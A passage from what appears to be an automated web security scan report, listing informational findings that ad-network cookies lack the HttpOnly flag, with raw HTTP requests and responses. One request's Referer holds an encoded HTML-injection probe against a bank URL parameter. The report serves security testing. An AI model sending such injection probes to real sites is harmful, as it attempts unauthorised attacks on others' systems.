/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#tl-~~!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!0=+rZu!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+e?/!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$35v!!!!#=(BU="; path=/; expires=Sun, 21-Jul-2013 20:31:12 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Fri, 22 Jul 2011 20:31:12 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

11.46. http://ads.adap.tv/beacons previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adap.tv
Path:	/beacons

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

adaptv_unique_user_cookie="7419174845235780020__TIME__2011-07-22+21%3A48%3A29";Path=/;Domain=.adap.tv;Expires=Tue, 31-Mar-43 06:35:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="7419174845235780020__TIME__2011-07-22+21%3A48%3A29";Path=/;Domain=.adap.tv;Expires=Tue, 31-Mar-43 06:35:09 GMT
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 940

jsonp1311396514352({
"beacons":["http://load.exelator.com/load/?p=104&g=080&j=0&u=1234567&site=2222", "http://adadvisor.net/adscores/g.pixel?sid=9204679687", "http://pix04.revsci.net/A11149/a4/0/0/12
...[SNIP]...

11.47. http://ads.adap.tv/cookie previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adap.tv
Path:	/cookie

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

adaptv_unique_user_cookie="7419174845235780020__TIME__2011-07-22+21%3A48%3A29";Path=/;Domain=.adap.tv;Expires=Tue, 31-Mar-43 06:35:09 GMT
adaptv_page_url=M3h9qeyoFhilJJ6HSKW-InPHBacY8pXAtMzCifxgdT-UiDx/4EkPRWTXLbfiCqu7pHS8vxoWeQv0nianaroGVLMSBFF8IRjleDt5svGVSjdzjPt624rG5HUu/qywG1feoOt0lqLFswM_;Path=/;Domain=.adap.tv

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.48. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PRvt=CBJ4gEqJghgpD2!B_BBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
PRgo=BBBAAuILBBVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
PRimp=98A80400-8221-F690-1309-E200007E0101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRca=|AK6u*2017:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRcp=|AK6uAA67:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRpl=|FgaO:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRcr=|GRmI:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRpc=|FgaOGRmI:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.49. http://ads.undertone.com/f previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/f

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

UTID=4fa40dc9ea734290be23eabae06b7886; expires=Sat, 21-Jul-2012 20:31:11 GMT; path=/
UTPROFILES=15177%239%3A37%2C38%7C12%3A67%7C22%3A64%2C7_63%2C39%7C23%3A64%2C7_63%2C39%7C259%3A49%2C7%7C303%3A64%7C845%3A67_64_63%2C7_37%2C6%7C1022%3A67_64%2C7_63%2C34_37%2C24%7C1023%3A67_64%2C7_63%2C35_37%2C23%7C1146%3A37%2C21%7C1147%3A37%2C21%7C1153%3A37%2C23%7C1158%3A37%2C23%7C1194%3A57%7C1671%3A62_61%2C2_27_10%7C2764%3A67%7C2817%3A57%7C2829%3A57%7C2837%3A57%7C2839%3A57%7C2847%3A57%7C2849%3A57%7C2851%3A57%7C2853%3A57%7C2855%3A57%7C2857%3A57%7C2859%3A57%7C2861%3A57%7C2863%3A57%7C2865%3A57%7C2877%3A37%2C20%7C2878%3A37%2C21%7C2881%3A37%2C19%7C2882%3A37%2C23%7C2894%3A37%2C21%7C2897%3A37%2C21%7C2898%3A37%2C23%7C2900%3A37%2C23%7C2901%3A37%2C23%7C2903%3A37%2C24%7C2909%3A37%2C20%7C2917%3A37%2C21%7C2918%3A37%2C21%7C2922%3A37%2C22%7C2924%3A37%2C22%7C2976%3A49%7C2977%3A67%7C2978%3A68%2C2%7C3080%3A40%7C3201%3A1; expires=Thu, 20-Oct-2011 20:31:11 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /f?pid=3201&cb=&bnum=473296105 HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/online-checking-accounts/interest-online-checking-account/?linkid=WWW_Z_Z_Z__C2_01_T_SP1ca646%252522%25253E%25253Ca%25253E91c2cd96a28
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-523485369-1305927820140; UTPROFILES=15168%239%3A28%2C38%7C12%3A58%7C22%3A55%2C7_54%2C39%7C23%3A55%2C7_54%2C39%7C259%3A40%2C7%7C303%3A55%7C845%3A58_55_54%2C7_28%2C6%7C1022%3A58_55%2C7_54%2C34_28%2C24%7C1023%3A58_55%2C7_54%2C35_28%2C23%7C1146%3A28%2C21%7C1147%3A28%2C21%7C1153%3A28%2C23%7C1158%3A28%2C23%7C1194%3A48%7C1671%3A53_52%2C2_18_1%7C2764%3A58%7C2817%3A48%7C2829%3A48%7C2837%3A48%7C2839%3A48%7C2847%3A48%7C2849%3A48%7C2851%3A48%7C2853%3A48%7C2855%3A48%7C2857%3A48%7C2859%3A48%7C2861%3A48%7C2863%3A48%7C2865%3A48%7C2877%3A28%2C20%7C2878%3A28%2C21%7C2881%3A28%2C19%7C2882%3A28%2C23%7C2894%3A28%2C21%7C2897%3A28%2C21%7C2898%3A28%2C23%7C2900%3A28%2C23%7C2901%3A28%2C23%7C2903%3A28%2C24%7C2909%3A28%2C20%7C2917%3A28%2C21%7C2918%3A28%2C21%7C2922%3A28%2C22%7C2924%3A28%2C22%7C2976%3A40%7C2977%3A58%7C2978%3A59%2C2%7C3080%3A31; UTID=4fa40dc9ea734290be23eabae06b7886; UTLIA=215464.lmvvy6-12267_215486.lmvz25-12268_215487.lmvvpk-12267_215483.lmvytj-12267_215465.lmvyky-12268_215473.lmvyck-12268_215470.lmvy3o-12267_205196.lljpij-4837_209452.llcw5o-14493_209454.llcw5n-13753_215478.lmvxv3-12268_215474.lmvx5b-12267_215467.lmvx5b-12268_215477.lmw00l-12267_215480.lmvwo9-12268_215468.lmvwo8-12267_215481.lmvzry-12267_215471.lmvzar-12268

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Vary: Accept-Encoding
Content-Length: 43
Content-Type: image/gif
Date: Fri, 22 Jul 2011 20:31:11 GMT
Connection: close
Set-Cookie: UTID=4fa40dc9ea734290be23eabae06b7886; expires=Sat, 21-Jul-2012 20:31:11 GMT; path=/
Set-Cookie: UTPROFILES=15177%239%3A37%2C38%7C12%3A67%7C22%3A64%2C7_63%2C39%7C23%3A64%2C7_63%2C39%7C259%3A49%2C7%7C303%3A64%7C845%3A67_64_63%2C7_37%2C6%7C1022%3A67_64%2C7_63%2C34_37%2C24%7C1023%3A67_64%2C7_63%2C35_37%2C23%7C1146%3A37%2C21%7C1147%3A37%2C21%7C1153%3A37%2C23%7C1158%3A37%2C23%7C1194%3A57%7C1671%3A62_61%2C2_27_10%7C2764%3A67%7C2817%3A57%7C2829%3A57%7C2837%3A57%7C2839%3A57%7C2847%3A57%7C2849%3A57%7C2851%3A57%7C2853%3A57%7C2855%3A57%7C2857%3A57%7C2859%3A57%7C2861%3A57%7C2863%3A57%7C2865%3A57%7C2877%3A37%2C20%7C2878%3A37%2C21%7C2881%3A37%2C19%7C2882%3A37%2C23%7C2894%3A37%2C21%7C2897%3A37%2C21%7C2898%3A37%2C23%7C2900%3A37%2C23%7C2901%3A37%2C23%7C2903%3A37%2C24%7C2909%3A37%2C20%7C2917%3A37%2C21%7C2918%3A37%2C21%7C2922%3A37%2C22%7C2924%3A37%2C22%7C2976%3A49%7C2977%3A67%7C2978%3A68%2C2%7C3080%3A40%7C3201%3A1; expires=Thu, 20-Oct-2011 20:31:11 GMT; path=/

GIF89a.............!.......,...........D..;

11.50. http://adserver.adtechus.com/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

28969=ADCAD0B8.1C14A0.2.14FCEB.2.0.4E2AD12E.1C0F21.13705BE.14B2.1;expires=Sat, 30 Jul 2011 13:48:30 GMT;domain=adserver.adtechus.com;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH;AdId=1840288;BnId=-1;;loc=100;target=_blank;misc=1921254557;rdclick=http://rmedia.boston.com/RealMedia/ads/click_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233? HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DDA4C606E651A440C6EAF39F00041BC

Response

11.51. http://ak1.abmr.net/is/a.collective-media.net previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/a.collective-media.net

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-A613C146A4736A716F4D563A34B5D402C7BA932EC779FA1D725AE50B42520B13-0DAEBB211BD7A29494C620D149AAF250AA6D442562DF8AB17EF05264F499A2C6; expires=Fri, 20-Jul-2012 18:00:45 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.52. http://ak1.abmr.net/is/showadsak.pubmatic.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/showadsak.pubmatic.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-C348B449BBBE2539E1034A1118A6E3787EA82F63D62D2C7F76953C22B7935737-FC8D49F470734A3C14F1D42B61C930E1D47B1B667E68FC6791CBD9ED9615B659; expires=Fri, 20-Jul-2012 18:00:55 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.53. http://amch.questionmarket.com/adsc/d922005/24/42823090/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d922005/24/42823090/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Fri, 23 Jul 2010 13:19:25 GMT; path=/; domain=.questionmarket.com
CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2_42825637-24-1_42823090-24-1; expires=Wed, 12 Sep 2012 05:19:26 GMT; path=/; domain=.questionmarket.com
ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4_922005-e^j@M-1; expires=Wed, 12-Sep-2012 05:19:26 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.54. http://amch.questionmarket.com/adsc/d922005/24/42823584/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d922005/24/42823584/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Fri, 23 Jul 2010 13:43:47 GMT; path=/; domain=.questionmarket.com
CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2_42825637-24-1_42853597-2-1_42823584-24-2; expires=Wed, 12 Sep 2012 05:43:48 GMT; path=/; domain=.questionmarket.com
ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4_921394-[^j@M-0_922005-e^j@M-/G; expires=Wed, 12-Sep-2012 05:43:48 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.55. http://amch.questionmarket.com/adsc/d922005/24/42823586/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d922005/24/42823586/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Fri, 23 Jul 2010 13:19:25 GMT; path=/; domain=.questionmarket.com
CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2_42823586-24-2; expires=Wed, 12 Sep 2012 05:19:26 GMT; path=/; domain=.questionmarket.com
ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4_922005-e^j@M-1; expires=Wed, 12-Sep-2012 05:19:26 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:19:26 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b201.dl
Set-Cookie: CS1=deleted; expires=Fri, 23 Jul 2010 13:19:25 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2_42823586-24-2; expires=Wed, 12 Sep 2012 05:19:26 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4_922005-e^j@M-1; expires=Wed, 12-Sep-2012 05:19:26 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.56. http://amch.questionmarket.com/adsc/d922005/24/42825515/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d922005/24/42825515/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Fri, 23 Jul 2010 13:43:47 GMT; path=/; domain=.questionmarket.com
CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2_42825637-24-1_42853597-2-1_42825515-24-2; expires=Wed, 12 Sep 2012 05:43:48 GMT; path=/; domain=.questionmarket.com
ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4_921394-[^j@M-0_922005-e^j@M-/G; expires=Wed, 12-Sep-2012 05:43:48 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:43:48 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b203.dl
Set-Cookie: CS1=deleted; expires=Fri, 23 Jul 2010 13:43:47 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2_42825637-24-1_42853597-2-1_42825515-24-2; expires=Wed, 12 Sep 2012 05:43:48 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4_921394-[^j@M-0_922005-e^j@M-/G; expires=Wed, 12-Sep-2012 05:43:48 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.57. http://amch.questionmarket.com/adsc/d922005/24/42825637/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d922005/24/42825637/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Fri, 23 Jul 2010 13:19:26 GMT; path=/; domain=.questionmarket.com
